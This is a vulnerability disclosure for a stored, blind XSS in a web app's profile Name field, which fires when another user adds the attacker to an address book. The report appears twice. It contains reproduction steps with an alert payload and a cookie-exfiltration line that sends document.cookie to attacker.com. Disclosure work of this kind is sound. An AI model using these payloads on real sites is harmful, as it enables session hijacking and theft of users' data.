Summary
A stored and blind XSS vulnerability exists in the Name Field of the user profile. A malicious attacker can change their name to a javascript payload, this payload is then executed when a user add the malicious user to thier Synchronization > Address books
Vulnerability Type
- Stored Cross-Site Scripting (XSS)
- Blind XSS
Steps to Reproduce (PoC)
-
Login as Admin
- Navigate to
System Settings > Users.
- Add two users:
user1 (User One) and user2 (User Two) using the +Add button.
-
Inject XSS Payload
- Logout from admin and login as
user1.
- Go to
My Account > Profile > Name.
- Set
First name: <img src=1 onerror=alert(1)>
- Click Save
-
Trigger Blind XSS
- Logout and login as
user2.
- Navigate to the
My account > Synchronization > Address books > +Add.
- Select
user1 (i,e : <img src=1 onerror=alert(1)> One)
- Click
Ok then Save
- The stored XSS payload is executed automatically.
Impact
-
Unauthorized Fetch Requests
Using <img onerror> or other techniques, an attacker can send background requests from the user’s browser to external domains or internal endpoints.
-
Data Theft / Session Hijacking / Account Manipulation
With a more advanced payload, an attacker could exfiltrate session data or perform actions on behalf of users.
If there is no valid csrf protection malicious actor can inject something like:
<img src=x onerror="new Image().src='http://attacker.com?c='+document.cookie">. Thus, a user's session can be compromised.
Recommendation
Sanitize input on all fields, especially those rendered to other users. Escape or encode HTML entities before rendering.
kh0kamoni Reporter
Summary
A stored and blind XSS vulnerability exists in the Name Field of the user profile. A malicious attacker can change their name to a javascript payload, this payload is then executed when a user add the malicious user to thier
Synchronization>Address booksVulnerability Type
Steps to Reproduce (PoC)
Login as Admin
System Settings > Users.user1 (User One)anduser2 (User Two)using the +Add button.Inject XSS Payload
user1.My Account > Profile > Name.First name: <img src=1 onerror=alert(1)>Trigger Blind XSS
user2.My account>Synchronization>Address books>+Add.user1(i,e :<img src=1 onerror=alert(1)> One)OkthenSaveImpact
Unauthorized Fetch Requests
Using
<img onerror>or other techniques, an attacker can send background requests from the user’s browser to external domains or internal endpoints.Data Theft / Session Hijacking / Account Manipulation
With a more advanced payload, an attacker could exfiltrate session data or perform actions on behalf of users.
If there is no valid csrf protection malicious actor can inject something like:
<img src=x onerror="new Image().src='http://attacker.com?c='+document.cookie">. Thus, a user's session can be compromised.Recommendation
Sanitize input on all fields, especially those rendered to other users. Escape or encode HTML entities before rendering.